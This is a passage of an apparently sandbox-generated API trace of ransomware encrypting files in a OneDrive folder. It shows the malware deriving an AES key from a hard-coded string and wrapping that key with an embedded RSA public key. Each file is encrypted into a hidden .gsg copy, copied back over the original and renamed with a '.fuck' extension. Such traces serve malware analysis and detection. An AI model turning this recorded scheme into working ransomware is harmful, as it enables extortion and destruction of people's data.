"c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png")) returned 0x20 [0270.226] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png", dwFileAttributes=0x80) returned 1 [0270.227] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.228] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.229] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.gsg", dwFileAttributes=0x2) returned 1 [0270.229] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.232] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.232] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.232] CryptHashData (hHash=0x2fa948, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.232] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa948, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa608) returned 1 [0270.232] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.232] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.232] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f277f8) returned 1 [0270.233] CryptImportPublicKeyInfo (in: hCryptProv=0x2f277f8, dwCertEncodingType=0x1, pInfo=0x2f32ec0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32ef0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32ef8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa448) returned 1 [0270.234] CryptEncrypt (in: hKey=0x2fa448, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.234] CryptEncrypt (in: hKey=0x2fa448, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26d58*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26d58*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f26d58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26d58*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.239] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.250] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.250] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.260] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.260] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.260] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.260] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.261] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.262] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.263] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x172, lpOverlapped=0x0) returned 1 [0270.263] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x172, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x180) returned 1 [0270.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x180, lpOverlapped=0x0) returned 1 [0270.263] CloseHandle (hObject=0x5d48) returned 1 [0270.263] CloseHandle (hObject=0x5d3c) returned 1 [0270.263] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png"), bFailIfExists=0) returned 1 [0270.275] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png", dwFileAttributes=0x0) returned 1 [0270.275] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png.gsg")) returned 1 [0270.277] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png.fuck")) returned 1 [0270.278] CryptDestroyHash (hHash=0x2fa948) returned 1 [0270.278] CryptDestroyKey (hKey=0x2fa608) returned 1 [0270.278] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.279] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.279] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.279] GetLastError () returned 0x0 [0270.279] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat")) returned 0x20 [0270.280] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat", dwFileAttributes=0x80) returned 1 [0270.438] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.439] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.440] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.gsg", dwFileAttributes=0x2) returned 1 [0270.440] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.443] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.443] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.443] CryptHashData (hHash=0x2fa3c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.443] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa3c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0270.443] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.443] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.443] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f276e8) returned 1 [0270.444] CryptImportPublicKeyInfo (in: hCryptProv=0x2f276e8, dwCertEncodingType=0x1, pInfo=0x2f31590*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f315c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f315c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa188) returned 1 [0270.444] CryptEncrypt (in: hKey=0x2fa188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.444] CryptEncrypt (in: hKey=0x2fa188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26de0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26de0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.444] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26de0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26de0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.487] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.489] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.490] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.490] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.490] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.490] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.496] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.496] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x1da, lpOverlapped=0x0) returned 1 [0270.496] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1da, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x1e0) returned 1 [0270.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x1e0, lpOverlapped=0x0) returned 1 [0270.496] CloseHandle (hObject=0x5d3c) returned 1 [0270.497] CloseHandle (hObject=0x5d48) returned 1 [0270.497] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat.gsg"), 